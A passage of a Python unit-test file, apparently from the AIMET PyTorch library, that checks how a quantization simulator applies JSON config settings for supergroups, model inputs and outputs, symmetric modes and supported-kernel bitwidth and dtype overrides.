"is_symmetric": "True"
},
"supported_kernels": [
{
"activation": {
"bitwidth": 16,
"dtype": "int"
},
"param": {
"bitwidth": 16,
"dtype": "int"
}
}
]
},
"params": {
"weight": {
"is_quantized": "True",
"is_symmetric": "False"
}
},
"op_type": {
"Conv": {
"supported_kernels": [
{
"activation": {
"bitwidth": 16,
"dtype": "int"
},
"param": {
"bitwidth": 8,
"dtype": "int"
}
}
]
}
},
"supergroups": [],
"model_input": {},
"model_output": {}
}
expected_supported_kernels = [
{
"activation": {
"bitwidth": 16,
"dtype": QuantizationDataType.int
},
"param": {
"bitwidth": 8,
"dtype": QuantizationDataType.int
}
}
]
with open('./data/quantsim_config.json', 'w') as f:
json.dump(quantsim_config, f)
sim = QuantizationSimModel(model, quant_scheme=QuantScheme.post_training_tf_enhanced,
config_file='./data/quantsim_config.json',
dummy_input=torch.rand(1, 3, 32, 32))
supported_kernels_in_defaults = sim._supported_kernels["Conv"]
assert len(supported_kernels_in_defaults) == 1
assert supported_kernels_in_defaults == expected_supported_kernels
def test_parse_config_file_supergroups(self):
""" Test that supergroup quantization parameters are set correctly when using json config file """
model = QuantSimTinyModel()
model.eval()
quantsim_config = {
"defaults": {
"ops": {
"is_output_quantized": "True",
"is_symmetric": "False"
},
"params": {
"is_quantized": "False",
"is_symmetric": "False"
}
},
"params": {},
"op_type": {},
"supergroups": [
{
"op_list": ["Conv", "BatchNormalization"]
},
{
"op_list": ["Relu", "MaxPool"]
},
{
"op_list": ["Conv", "Relu", "AveragePool"]
},
{
"op_list": ["Conv", "Clip"]
},
],
"model_input": {},
"model_output": {}
}
with open('./data/quantsim_config.json', 'w') as f:
json.dump(quantsim_config, f)
# Use in_place=True here for easy access to modules through model instance variables
sim = QuantizationSimModel(model, quant_scheme=QuantScheme.post_training_tf_enhanced,
config_file='./data/quantsim_config.json',
in_place=True, dummy_input=torch.rand(1, 3, 32, 32))
for _, module in sim.model.named_modules():
if isinstance(module, QcQuantizeWrapper):
# Check configs for starts of supergroups
if module in [model.conv1, model.relu1, model.conv2, model.conv3]:
assert not module.output_quantizers[0].enabled
# Check configs for middle ops in supergroups
elif module == model.relu3:
assert not module.input_quantizer.enabled
assert not module.output_quantizers[0].enabled
# Check configs for ends of supergroups
elif module in [model.bn1, model.maxpool, model.bn2, model.avgpool, model.relu2]:
assert not module.input_quantizer.enabled
assert module.output_quantizers[0].enabled
else:
assert not module.input_quantizer.enabled
assert module.output_quantizers[0].enabled
if os.path.exists('./data/quantsim_config.json'):
os.remove('./data/quantsim_config.json')
def test_parse_config_file_elementwise_ops(self):
""" Test that elementwise op quantizers are set as expected """
model = SingleResidual()
model.eval()
quantsim_config = {
"defaults": {
"ops": {},
"params": {}
},
"params": {},
"op_type": {
"Add": {
"is_input_quantized": "True"
}
},
"supergroups": [],
"model_input": {},
"model_output": {}
}
with open('./data/quantsim_config.json', 'w') as f:
json.dump(quantsim_config, f)
sim = QuantizationSimModel(model, quant_scheme=QuantScheme.post_training_tf_enhanced,
config_file='./data/quantsim_config.json',
dummy_input=torch.rand(1, 3, 32, 32))
for name, module in sim.model.named_modules():
if isinstance(module, QcQuantizeWrapper):
if name in ['conv3', 'ada']:
# model.conv3 and model.ada are inputs to add
assert module.output_quantizers[0].enabled
else:
assert not module.output_quantizers[0].enabled
assert not module.input_quantizer.enabled
if os.path.exists('./data/quantsim_config.json'):
os.remove('./data/quantsim_config.json')
def test_parse_config_file_model_inputs(self):
""" Test that model input quantization parameters are set correctly when using json config file """
model = MultiInput()
model.eval()
quantsim_config = {
"defaults": {
"ops": {},
"params": {}
},
"params": {},
"op_type": {},
"supergroups": [],
"model_input": {
"is_input_quantized": "True"
},
"model_output": {}
}
with open('./data/quantsim_config.json', 'w') as f:
json.dump(quantsim_config, f)
sim = QuantizationSimModel(model, quant_scheme=QuantScheme.post_training_tf_enhanced, config_file='./data/quantsim_config.json',
dummy_input=(torch.rand(1, 3, 32, 32), torch.rand(1, 3, 20, 20)), in_place=True)
for name, module in sim.model.named_modules():
if isinstance(module, QcQuantizeWrapper):
# Output of add op is input quantized
if name in ('conv1', 'conv3'):
assert module.input_quantizer.enabled
else:
assert not module.input_quantizer.enabled
assert not module.output_quantizers[0].enabled
assert not module.input_quantizer.use_symmetric_encodings
assert not module.output_quantizers[0].use_symmetric_encodings
if os.path.exists('./data/quantsim_config.json'):
os.remove('./data/quantsim_config.json')
def test_parse_config_file_model_outputs(self):
""" Test that model output quantization parameters are set correctly when using json config file """
model = SingleResidual()
model.eval()
quantsim_config = {
"defaults": {
"ops": {},
"params": {}
},
"params": {},
"op_type": {},
"supergroups": [],
"model_input": {},
"model_output": {
"is_output_quantized": "True"
}
}
with open('./data/quantsim_config.json', 'w') as f:
json.dump(quantsim_config, f)
sim = QuantizationSimModel(model, quant_scheme=QuantScheme.post_training_tf_enhanced, config_file='./data/quantsim_config.json',
dummy_input=torch.rand(1, 3, 32, 32))
for name, module in sim.model.named_modules():
if isinstance(module, QcQuantizeWrapper):
if name == 'fc':
# model.conv3 and model.ada are inputs to add
assert module.output_quantizers[0].enabled
else:
assert not module.output_quantizers[0].enabled
assert not module.input_quantizer.enabled
if os.path.exists('./data/quantsim_config.json'):
os.remove('./data/quantsim_config.json')
def test_supergroups_with_functional_add(self):
""" Test supergroup with functional add """
model = SingleResidual()
model.eval()
quantsim_config = {
"defaults": {
"ops": {
"is_output_quantized": "True"
},
"params": {}
},
"params": {},
"op_type": {},
"supergroups": [
{
"op_list": ["Add", "Relu"]
}
],
"model_input": {},
"model_output": {}
}
with open('./data/quantsim_config.json', 'w') as f:
json.dump(quantsim_config, f)
# Use in_place=True here for easy access to modules through model instance variables
sim = QuantizationSimModel(model, quant_scheme=QuantScheme.post_training_tf_enhanced,
config_file='./data/quantsim_config.json',
in_place=True, dummy_input=torch.rand(1, 3, 32, 32))
for _, module in sim.model.named_modules():
if isinstance(module, QcQuantizeWrapper):
# Check configs for starts of supergroups
if module == model.relu3:
# If add were not part of the supergroup, relu's input quantizer would be enabled
assert not module.input_quantizer.enabled
if os.path.exists('./data/quantsim_config.json'):
os.remove('./data/quantsim_config.json')
def test_supergroups_with_module_add(self):
""" Test supergroup with add module """
model = SingleResidualWithModuleAdd()
model.eval()
quantsim_config = {
"defaults": {
"ops": {
"is_output_quantized": "True"
},
"params": {}
},
"params": {},
"op_type": {},
"supergroups": [
{
"op_list": ["Add", "Relu"]
}
],
"model_input": {},
"model_output": {}
}
with open('./data/quantsim_config.json', 'w') as f:
json.dump(quantsim_config, f)
# Use in_place=True here for easy access to modules through model instance variables
sim = QuantizationSimModel(model, quant_scheme=QuantScheme.post_training_tf_enhanced,
config_file='./data/quantsim_config.json',
in_place=True, dummy_input=torch.rand(1, 3, 32, 32))
for _, module in sim.model.named_modules():
if isinstance(module, QcQuantizeWrapper):
# Check configs for starts of supergroups
if module == model.add:
# If add were not part of the supergroup, relu's input quantizer would be enabled
assert not module.output_quantizer.enabled
else:
assert module.output_quantizer.enabled
assert not module.input_quantizer.enabled
if os.path.exists('./data/quantsim_config.json'):
os.remove('./data/quantsim_config.json')
def test_parse_config_file_symmetric_modes(self):
""" Test that model output quantization parameters are set correctly when using json config file """
model = SingleResidual()
model.eval()
quantsim_config = {
"defaults": {
"ops": {},
"params": {},
"strict_symmetric": "True",
"unsigned_symmetric": "False"
},
"params": {},
"op_type": {},
"supergroups": [],
"model_input": {},
"model_output": {
}
}
with open('./data/quantsim_config.json', 'w') as f:
json.dump(quantsim_config, f)
sim = QuantizationSimModel(model, quant_scheme=QuantScheme.post_training_tf_enhanced,
config_file='./data/quantsim_config.json',
dummy_input=torch.rand(1, 3, 32, 32))
for name, module in sim.model.named_modules():
if isinstance(module, QcQuantizeWrapper):
for q in module.input_quantizers:
assert q.use_strict_symmetric
assert not q.use_unsigned_symmetric
for q in module.output_quantizers:
assert q.use_strict_symmetric
assert not q.use_unsigned_symmetric
for q in module.param_quantizers.values():
assert q.use_strict_symmetric
assert not q.use_unsigned_symmetric
if os.path.exists('./data/quantsim_config.json'):
os.remove('./data/quantsim_config.json')
def test_get_all_ops_in_neighborhood(self):
""" Test that default quantization parameters are set correctly when using json config file """
model = SingleResidual()
model.eval()
input_shapes = (1, 3, 32, 32)
random_inputs = utils.create_rand_tensors_given_shapes(input_shapes)
conn_graph = ConnectedGraph(model, random_inputs)
starting_op = conn_graph.get_all_ops()['Conv_7']
add_10_op = conn_graph.get_all_ops()['Add_10']
neighborhood = get_all_ops_in_neighborhood(starting_op, 'output')
assert len(neighborhood) == 2
assert starting_op in neighborhood
assert add_10_op in neighborhood
@pytest.mark.cuda
def test_parse_config_file_defaults_gpu(self):
""" Test that default quantization parameters are set correctly when using json config file """
model = SingleResidual()
model.eval()
model.cuda()
quantsim_config = {
"defaults": {
"ops": {
"is_output_quantized": "True",
"is_symmetric": "False"
},
"params": {
"is_quantized": "False",
"is_symmetric": "True"
}
},
"params": {},
"op_type": {},
"supergroups": [],
"model_input": {},
"model_output": {}
}
with open('./data/quantsim_config.json', 'w') as f:
json.dump(quantsim_config, f)
sim = QuantizationSimModel(model, quant_scheme=QuantScheme.post_training_tf_enhanced, config_file='./data/quantsim_config.json',
dummy_input=torch.rand(1, 3, 32, 32).cuda(), in_place=True)
for name, module in sim.model.named_modules():
if isinstance(module, QcQuantizeWrapper):
# Output of add op is input quantized
if name == 'relu3':
assert module.input_quantizer.enabled
else:
assert not module.input_quantizer.enabled
assert module.output_quantizers[0].enabled
assert not module.input_quantizer.use_symmetric_encodings
assert not module.output_quantizers[0].use_symmetric_encodings
if module.param_quantizers:
for _, param_quantizer in module.param_quantizers.items():
assert not param_quantizer.enabled
assert param_quantizer.use_symmetric_encodings
if os.path.exists('./data/quantsim_config.json'):
os.remove('./data/quantsim_config.json')
def test_gelu_layernorm_quantsim_config(self):
"""
Create a network with LayerNorm and GELU
Override quantization config and check config is applied
This is a validation for actual entry in the map_torch_types_to_onnx in onnx_utils
This is used by connected graph to apply op level specific quantsim config.
:return:
"""
import json
from aimet_common.defs import QuantScheme
from aimet_torch.quantsim import QuantizationSimModel
import libpymo
class ModelWithGeluLayerNorm(torch.nn.Module):
def __init__(self):
super(ModelWithGeluLayerNorm, self).__init__()
self.linear1 = torch.nn.Linear(4, 4)
# default attribute -
# eps = 1e-05 and elementwise_affine = True
# parameters : weight and bias
self.ln1 = torch.nn.LayerNorm(4)
self.gelu1 = torch.nn.GELU()
def forward(self, x):
x = self.linear1(x)
x = self.ln1(x)
x = self.gelu1(x)
return x
# create custom config to override LayerNorm and GELU
quantsim_config = {
"defaults": {
"ops": {
"is_output_quantized": "True",
"is_symmetric": "False"
},
"params": {
"is_quantized": "False",
"is_symmetric": "True"
}
},
"params": {},
"op_type": {
"LayerNorm": {
"is_input_quantized": "True",
"params": {
"bias": {
"is_quantized": "True"
}
}
},
"GELU": {
"is_input_quantized": "True"
}
},
"supergroups": [],
"model_input": {},
"model_output": {}
}
with open('./data/quantsim_config.json', 'w') as f:
json.dump(quantsim_config, f)
model = ModelWithGeluLayerNorm()
model.eval()
random_input = torch.rand(1, 4, 4)
def forward_pass(model, args):
model.eval()
with torch.no_grad():
model(*random_input)
# QuantSim for model
sim = QuantizationSimModel(model, quant_scheme=QuantScheme.post_training_tf,
config_file='./data/quantsim_config.json',
dummy_input=random_input)
sim.compute_encodings(forward_pass, None)
# check quantizer added to parameters of LayerNorm
from aimet_torch.qc_quantize_op import StaticGridPerTensorQuantizer
assert(isinstance(sim.model.ln1.param_quantizers['weight'], StaticGridPerTensorQuantizer))
assert(isinstance(sim.model.ln1.param_quantizers['bias'], StaticGridPerTensorQuantizer))
# LayerNorm input quantization is disabled by default
# override with custom config file, this needs appropriate entry in onnx node name mapping
assert(isinstance(sim.model.ln1.input_quantizer, StaticGridPerTensorQuantizer))
assert(sim.model.ln1.input_quantizer.encoding)
in_quantizer = sim.model.ln1.input_quantizer
assert(in_quantizer.enabled) # disabled by default, override with config file
assert(in_quantizer.round_mode == libpymo.RoundingMode.ROUND_NEAREST)
assert(in_quantizer.quant_scheme == QuantScheme.post_training_tf)
assert(in_quantizer.bitwidth == 8)
# GELU input quantization is disabled by default
# override with custom config file, this needs appropriate entry in onnx node name mapping
assert(isinstance(sim.model.gelu1.input_quantizer, StaticGridPerTensorQuantizer))
assert(sim.model.gelu1.input_quantizer.encoding)
in_quantizer = sim.model.gelu1.input_quantizer
assert(in_quantizer.enabled) # disabled by default, override with config file
assert(in_quantizer.round_mode == libpymo.RoundingMode.ROUND_NEAREST)
assert(in_quantizer.quant_scheme == QuantScheme.post_training_tf)
assert(in_quantizer.bitwidth == 8)
# remove test config created
if os.path.exists('./data/quantsim_config.json'):
os.remove('./data/quantsim_config.json')
def test_default_quantsim_config_not_in_default_config_file_enforce_false(self):
"""
Tests application of override config rule for default bitwidth and dtype for params and act.
In this test, default supported kernel list (fp 16) in the config file DOES NOT SUPPORT
default quantsim config (int 8) + ENFORCE_TARGET_DTYPE_BITWIDTH_CONFIG is also set to True.
Tests application of default config rule for op level bitwidth and dtype for params
:return:
"""
qsim_config.ENFORCE_TARGET_DTYPE_BITWIDTH_CONFIG = False
model = SingleResidual()
model.eval()
quantsim_config = {
"defaults": {
"ops": {
"is_output_quantized": "True"
},
"params": {
"is_quantized": "True"
},
"supported_kernels": [
{
"activation": {
"bitwidth": 16,
"dtype": "float"
},
"param": {
"bitwidth": 16,
"dtype": "float"
}
}
]
},
"params": {
"bias": {
"is_quantized": "False"
}
},
"op_type": {
"Conv": {
"is_input_quantized": "True",
"is_output_quantized": "True",
"params": {
"weight": {
"is_quantized": "True"
},
"bias": {
"is_quantized": "False"
}
}
}
},
"supergroups": [
],
"model_input": {
"is_input_quantized": "True"
},
"model_output": {}
}
with open('./data/quantsim_config.json', 'w') as f:
json.dump(quantsim_config, f)
INPUT_SHAPE = (1, 3, 32, 32)
def forward_fn(model, _):
torch.manual_seed(10)
model.eval()
with torch.no_grad():
_ = model(torch.randn(INPUT_SHAPE))
sim = QuantizationSimModel(model, quant_scheme=QuantScheme.post_training_tf_enhanced,
config_file='./data/quantsim_config.json',
dummy_input=torch.rand(1, 3, 32, 32), in_place=True,
default_param_bw=8, default_output_bw=8, default_data_type=QuantizationDataType.int)
sim.compute_encodings(forward_fn, forward_pass_callback_args=None)
# all quantizers should be quantsim default quantsim dtype and bw (int 8)
assert(sim.model.conv1.param_quantizers['weight'].enabled == True)
assert(sim.model.conv1.param_quantizers['weight'].bitwidth == 8)
assert(sim.model.conv1.param_quantizers['weight'].data_type == QuantizationDataType.int)
assert(sim.model.conv1.output_quantizers[0].bitwidth == 8)
assert(sim.model.conv1.output_quantizers[0].data_type == QuantizationDataType.int)
# all quantizers should be quantsim default quantsim dtype and bw (int 8)
# that is QUANTSIM DEFAULT bw / dtype (int 8).
assert(sim.model.fc.param_quantizers['weight'].enabled)
assert(sim.model.fc.param_quantizers['bias'].enabled == False)
assert(sim.model.fc.param_quantizers['weight'].bitwidth == 8)
assert(sim.model.fc.param_quantizers['weight'].data_type == QuantizationDataType.int)
assert(sim.model.fc.param_quantizers['bias'].bitwidth == 8)
assert(sim.model.fc.param_quantizers['bias'].data_type == QuantizationDataType.int)
assert(sim.model.fc.output_quantizers[0].bitwidth == 8)
assert(sim.model.fc.output_quantizers[0].data_type == QuantizationDataType.int)
assert(sim.model.relu1.output_quantizers[0].bitwidth == 8)
assert(sim.model.relu1.output_quantizers[0].data_type == QuantizationDataType.int)
# remove test config created
qsim_config.ENFORCE_TARGET_DTYPE_BITWIDTH_CONFIG = False
if os.path.exists('./data/quantsim_config.json'):
os.remove('./data/quantsim_config.json')
def test_default_quantsim_config_in_default_config_file_enforce_true(self):
"""
Tests application of override config rule for default bitwidth and dtype for params and act.
In this test, default supported kernel list (int 8, fp 16) in the config file CONTAINS
default quantsim config (int 8) + ENFORCE_TARGET_DTYPE_BITWIDTH_CONFIG is also set to True.
Tests application of default config rule for op level bitwidth and dtype for params
:return:
"""
qsim_config.ENFORCE_TARGET_DTYPE_BITWIDTH_CONFIG = True
model = SingleResidual()
model.eval()
quantsim_config = {
"defaults": {
"ops": {
"is_output_quantized": "True"
},
"params": {
"is_quantized": "True"
},
"supported_kernels": [
{
"activation": {
"bitwidth": 16,
"dtype": "float"
},
"param": {
"bitwidth": 16,
"dtype": "float"
}
},
{
"activation": {
"bitwidth": 8,
"dtype": "int"
},
"param": {
"bitwidth": 8,
"dtype": "int"
}
}
]
},
"params": {
"bias": {
"is_quantized": "False"
}
},
"op_type": {
"Conv": {
"supported_kernels":
[
{
"activation": {
"bitwidth": 16,
"dtype": "float"
},
"param": {
"bitwidth": 16,
"dtype": "float"
}
},
{
"activation": {
"bitwidth": 8,
"dtype": "int"
},
"param": {
"bitwidth": 16,
"dtype": "int"
}
},
],
"is_input_quantized": "True",
"is_output_quantized": "True",
"params": {
"weight": {
"is_quantized": "True"
},
"bias": {
"is_quantized": "False"
}
}
}
},
"supergroups": [
],
"model_input": {
"is_input_quantized": "True"
},
"model_output": {}
}
with open('./data/quantsim_config.json', 'w') as f:
json.dump(quantsim_config, f)
INPUT_SHAPE = (1, 3, 32, 32)
def forward_fn(model, _):
torch.manual_seed(10)
model.eval()
with torch.no_grad():
_ = model(torch.randn(INPUT_SHAPE))
sim = QuantizationSimModel(model, quant_scheme=QuantScheme.post_training_tf_enhanced,
config_file='./data/quantsim_config.json',
dummy_input=torch.rand(1, 3, 32, 32), in_place=True,
default_data_type=QuantizationDataType.int, default_output_bw=8, default_param_bw=8)
sim.compute_encodings(forward_fn, forward_pass_callback_args=None)
# enforce is true, however default quantsim bw / dtype (fp16) is not the config file supported kernels override at index 0.
# apply override 0 # activation : bw = 16, float # param : bw = 16, float
assert(sim.model.conv1.param_quantizers['weight'].enabled == True)
assert(sim.model.conv1.param_quantizers['weight'].bitwidth == 16)
assert(sim.model.conv1.param_quantizers['weight'].data_type == QuantizationDataType.float)
assert(sim.model.conv1.output_quantizers[0].bitwidth == 16)
assert(sim.model.conv1.output_quantizers[0].data_type == QuantizationDataType.float)
assert(sim.model.fc.param_quantizers['weight'].enabled)
assert(sim.model.fc.param_quantizers['bias'].enabled == False)
assert(sim.model.fc.param_quantizers['weight'].bitwidth == 16)
assert(sim.model.fc.param_quantizers['weight'].data_type == QuantizationDataType.float)
assert(sim.model.fc.param_quantizers['bias'].bitwidth == 16)
assert(sim.model.fc.param_quantizers['bias'].data_type == QuantizationDataType.float)
assert(sim.model.fc.output_quantizers[0].bitwidth == 16)
assert(sim.model.fc.output_quantizers[0].data_type == QuantizationDataType.float)
assert(sim.model.relu1.output_quantizers[0].bitwidth == 16)
assert(sim.model.relu1.output_quantizers[0].data_type == QuantizationDataType.float)
# remove test config created
qsim_config.ENFORCE_TARGET_DTYPE_BITWIDTH_CONFIG = False
if os.path.exists('./data/quantsim_config.json'):
os.remove('./data/quantsim_config.json')
def test_default_quantsim_config_not_in_default_config_file_enforce_true(self):
"""
Tests application of override config rule for default bitwidth and dtype for params and act.
In this test, default supported kernel list (fp 16) in the config file DOES NOT SUPPORT
default quantsim config (int 8) + ENFORCE_TARGET_DTYPE_BITWIDTH_CONFIG is also set to True.
Tests application of default config rule for op level bitwidth and dtype for params
:return:
"""
qsim_config.ENFORCE_TARGET_DTYPE_BITWIDTH_CONFIG = True
model = SingleResidual()
model.eval()
quantsim_config = {
"defaults": {
"ops": {
"is_output_quantized": "True"
},
"params": {
"is_quantized": "True"
},
"supported_kernels": [
{
"activation": {
"bitwidth": 16,
"dtype": "float"
},
"param": {
"bitwidth": 16,
"dtype": "float"
}
},
{
"activation": {
"bitwidth": 16,
"dtype": "int"
},
"param": {
"bitwidth": 16,
"dtype": "int"
}
}
]
},
"params": {
"bias": {
"is_quantized": "False"
}
},
"op_type": {
"Conv": {
"is_input_quantized": "True",
"is_output_quantized": "True",
"params": {
"weight": {
"is_quantized": "True"
},
"bias": {
"is_quantized": "False"
}
}
}
},
"supergroups": [
],
"model_input": {
"is_input_quantized": "True"
},
"model_output": {}
}
with open('./data/quantsim_config.json', 'w') as f:
json.dump(quantsim_config, f)
INPUT_SHAPE = (1, 3, 32, 32)
def forward_fn(model, _):
torch.manual_seed(10)
model.eval()
with torch.no_grad():
_ = model(torch.randn(INPUT_SHAPE))
sim = QuantizationSimModel(model, quant_scheme=QuantScheme.post_training_tf_enhanced,
config_file='./data/quantsim_config.json',
dummy_input=torch.rand(1, 3, 32, 32), in_place=True,
default_data_type=QuantizationDataType.int, default_output_bw=8, default_param_bw=8)
sim.compute_encodings(forward_fn, forward_pass_callback_args=None)
# enforce is true, however default quantsim bw / dtype (int 8) is NOT IN the config file supported kernels
# should be configured with config file default supported kernel [0]
# activation : bw = 16 , float
# param : bw = 16, float
assert(sim.model.conv1.param_quantizers['weight'].enabled == True)
assert(sim.model.conv1.param_quantizers['weight'].bitwidth == 16)
assert(sim.model.conv1.param_quantizers['weight'].data_type == QuantizationDataType.float)
assert(sim.model.conv1.output_quantizers[0].bitwidth == 16)
assert(sim.model.conv1.output_quantizers[0].data_type == QuantizationDataType.float)
assert(sim.model.fc.param_quantizers['weight'].enabled)
assert(sim.model.fc.param_quantizers['bias'].enabled == False)
assert(sim.model.fc.param_quantizers['weight'].bitwidth == 16)
assert(sim.model.fc.param_quantizers['weight'].data_type == QuantizationDataType.float)
assert(sim.model.fc.param_quantizers['bias'].bitwidth == 16)
assert(sim.model.fc.param_quantizers['bias'].data_type == QuantizationDataType.float)
assert(sim.model.fc.output_quantizers[0].bitwidth == 16)
assert(sim.model.fc.output_quantizers[0].data_type == QuantizationDataType.float)
assert(sim.model.relu1.output_quantizers[0].bitwidth == 16)
assert(sim.model.relu1.output_quantizers[0].data_type == QuantizationDataType.float)
# remove test config created
qsim_config.ENFORCE_TARGET_DTYPE_BITWIDTH_CONFIG = False
if os.path.exists('./data/quantsim_config.json'):
os.remove('./data/quantsim_config.json')
def test_check_correctness_of_dtype_bw_rules_valid_case(self):
"""
Test to check api check_correctness_of_dtype_bw_rules, valid config case
:return:
"""
model = SingleResidual()
model.eval()
quantsim_config = {
"defaults": {
"ops": {
"is_output_quantized": "True"
},
"params": {
"is_quantized": "True"
},
"supported_kernels": [
{
"activation": {
"bitwidth": 16,
"dtype": "int"
},
"param": {
"bitwidth": 16,
"dtype": "int"
}
},
{
"activation": {
"bitwidth": 8,
"dtype": "int"
},
"param": {
"bitwidth": 16,
"dtype": "int"
}
}
]
},
"params": {
"bias": {
"is_quantized": "False"
}
},
"op_type": {
"Conv": {
"supported_kernels":
[
{
"activation": {
"bitwidth": 16,
"dtype": "float"
},
"param": {
"bitwidth": 16,
"dtype": "float"
}
},
],
"is_input_quantized": "True",
"is_output_quantized": "True",
"params": {
"weight": {
"is_quantized": "True"
},
"bias": {
"is_quantized": "False"
}
}
}
},
"supergroups": [
],
"model_input": {
"is_input_quantized": "True"
},
"model_output": {}
}
config_file = './data/quantsim_config.json'
with open(config_file, 'w') as f:
json.dump(quantsim_config, f)
INPUT_SHAPE = (1, 3, 32, 32)
def forward_fn(model, _):
torch.manual_seed(10)
model.eval()
with torch.no_grad():
_ = model(torch.randn(INPUT_SHAPE))
supported_kernels = {}
from aimet_torch.quantsim_config.quantsim_config import QuantSimConfigurator
dummy_input = torch.randn(INPUT_SHAPE)
connected_graph = ConnectedGraph(model, dummy_input)
qsim_config = QuantSimConfigurator(model, connected_graph, config_file, supported_kernels,
quantsim_output_bw=8, quantsim_param_bw=8,
quantsim_data_type=QuantizationDataType.int)
qsim_dtype_bw = QuantDtypeBwInfo(data_type=QuantizationDataType.int, act_bw=8 , param_bw=8)
assert qsim_config.check_correctness_of_dtype_bw_rules(qsim_dtype_bw)
# remove test config created
if os.path.exists('./data/quantsim_config.json'):
os.remove('./data/quantsim_config.json')
def test_check_correctness_of_dtype_bw_rules_default_supported_kernels_exception_case(self):
"""
Test to check api check_correctness_of_dtype_bw_rules, invalid default supported_kernels case
:return:
"""
model = SingleResidual()
model.eval()
quantsim_config = {
"defaults": {
"ops": {
"is_output_quantized": "True"
},
"params": {
"is_quantized": "True"
},
"supported_kernels": [
{
"activation": {
"bitwidth": 4,
"dtype": "int"
},
"param": {
"bitwidth": 16,
"dtype": "int"
}
},
{
"activation": {
"bitwidth": 8,
"dtype": "int"
},
"param": {
"bitwidth": 16,
"dtype": "int"
}
}
]
},
"params": {
"bias": {
"is_quantized": "False"
}
},
"op_type": {
"Conv": {
"supported_kernels":
[
{
"activation": {
"bitwidth": 16,
"dtype": "float"
},
"param": {
"bitwidth": 16,
"dtype": "float"
}
},
],
"is_input_quantized": "True",
"is_output_quantized": "True",
"params": {
"weight": {
"is_quantized": "True"
},
"bias": {
"is_quantized": "False"
}
}
}
},
"supergroups": [
],
"model_input": {
"is_input_quantized": "True"
},
"model_output": {}
}
config_file = './data/quantsim_config.json'
with open(config_file, 'w') as f:
json.dump(quantsim_config, f)
INPUT_SHAPE = (1, 3, 32, 32)
supported_kernels = {}
from aimet_torch.quantsim_config.quantsim_config import QuantSimConfigurator
dummy_input = torch.randn(INPUT_SHAPE)
connected_graph = ConnectedGraph(model, dummy_input)
qsim_config = QuantSimConfigurator(model, connected_graph, config_file, supported_kernels,
quantsim_output_bw=8, quantsim_param_bw=8,
quantsim_data_type=QuantizationDataType.int)
qsim_dtype_bw = QuantDtypeBwInfo(data_type=QuantizationDataType.int, act_bw=8 , param_bw=8)
exception_raised = False
try:
qsim_config.check_correctness_of_dtype_bw_rules(qsim_dtype_bw)
except NotImplementedError as exc:
print(" Test raised exception as expected ", exc)
exception_raised = True
assert exception_raised
# remove test config created
if os.path.exists('./data/quantsim_config.json'):
os.remove('./data/quantsim_config.json')
def test_check_correctness_of_dtype_bw_rules_op_level_supported_kernels_exception_case(self):
"""
Test to check api check_correctness_of_dtype_bw_rules, invalid op level supported_kernels case
:return:
"""
model = SingleResidual()
model.eval()
quantsim_config = {
"defaults": {
"ops": {
"is_output_quantized": "True"
},
"params": {
"is_quantized": "True"
},
"supported_kernels": [
{
"activation": {
"bitwidth": 8,
"dtype": "int"
},
"param": {
"bitwidth": 8,
"dtype": "int"
}
}
]
},
"params": {
"bias": {
"is_quantized": "False"
}
},
"op_type": {
"Conv": {
"supported_kernels":
[
{
"activation": {
"bitwidth": 8,
"dtype": "int"
},
"param": {
"bitwidth": 4,
"dtype": "int"
}
},
],
"is_input_quantized": "True",
"is_output_quantized": "True",
"params": {
"weight": {
"is_quantized": "True"
},
"bias": {
"is_quantized": "False"
}
}
}
},
"supergroups": [
],
"model_input": {
"is_input_quantized": "True"
},
"model_output": {}
}
config_file = './data/quantsim_config.json'
with open(config_file, 'w') as f:
json.dump(quantsim_config, f)
INPUT_SHAPE = (1, 3, 32, 32)
def forward_fn(model, _):
torch.manual_seed(10)
model.eval()
with torch.no_grad():
_ = model(torch.randn(INPUT_SHAPE))
supported_kernels = {}
from aimet_torch.quantsim_config.quantsim_config import QuantSimConfigurator
dummy_input = torch.randn(INPUT_SHAPE)
connected_graph = ConnectedGraph(model, dummy_input)
qsim_config = QuantSimConfigurator(model, connected_graph, config_file, supported_kernels,
quantsim_output_bw=8, quantsim_param_bw=8,
quantsim_data_type=QuantizationDataType.int)
qsim_dtype_bw = QuantDtypeBwInfo(data_type=QuantizationDataType.int, act_bw=8 , param_bw=8)
exception_raised = False
try:
qsim_config.check_correctness_of_dtype_bw_rules(qsim_dtype_bw)
except NotImplementedError as exc:
print(" Test raised exception as expected ", exc)
exception_raised = True
assert exception_raised
# remove test config created
if os.path.exists('./data/quantsim_config.json'):
os.remove('./data/quantsim_config.json')
def test_target_rule_enforced_apply_default_and_op_level_overrides_valid_case(self):
"""
validates Config overrides provided are valid combination and application of both default level as well as
op level kernel overrides for dtype and bitiwdth.
Quantsim created with (int4, int4) defaults
Default supported kernels override (at index 0 ) is (int 8, int 8) --> applied.
Default at op level override at index 0 of supported_kernels for Conv type is
(fp 16, fp16) --> applied to weight param.
:return:
"""
model = SingleResidual()
model.eval()
# quantsim config has default kernel overrides as well as op level kernel override
# we begin with quantsim default config (int 4, int 4), during isntantiation of quantsim object.
# Then, using config file we apply two levels of overrides.
# 1) default supported_kernels at index 0 , is used to override default act/param bw dtype with int8 / int8
# 2) After this, at op level, specifically for Conv types, there is a override provided as fp16/ fp16
# So, param quantizers of conv shall be updated to FP16 as a override, while retaining output at int 8 as
# configured by default level supported_kernels.
quantsim_config = {
"defaults": {
"ops": {
"is_output_quantized": "True"
},
"params": {
"is_quantized": "True"
},
"supported_kernels": [
{
"activation": {
"bitwidth": 8,
"dtype": "int"
},
"param": {
"bitwidth": 8,
"dtype": "int"
}
},
{
"activation": {
"bitwidth": 4,
"dtype": "int"
},
"param": {
"bitwidth": 4,
"dtype": "int"
}
}
]
},
"params": {
"bias": {
"is_quantized": "False"
}
},
"op_type": {
"Conv": {
"is_input_quantized": "True",
"is_output_quantized": "True",
"params": {
"weight": {
"is_quantized": "True"
},
"bias": {
"is_quantized": "False"
}
},
"supported_kernels":
[
{
"activation": {
"bitwidth": 16,
"dtype": "float"
},
"param": {
"bitwidth": 16,
"dtype": "float"
}
},
]
}
},
"supergroups": [
],
"model_input": {
"is_input_quantized": "True"
},
"model_output": {}
}
with open('./data/quantsim_config.json', 'w') as f:
json.dump(quantsim_config, f)
INPUT_SHAPE = (1, 3, 32, 32)
def forward_fn(model, _):
torch.manual_seed(10)
model.eval()
with torch.no_grad():
_ = model(torch.randn(INPUT_SHAPE))
# set enforce to true for this test
qsim_config.ENFORCE_TARGET_DTYPE_BITWIDTH_CONFIG = True
sim = QuantizationSimModel(model, quant_scheme=QuantScheme.post_training_tf_enhanced,
config_file='./data/quantsim_config.json',
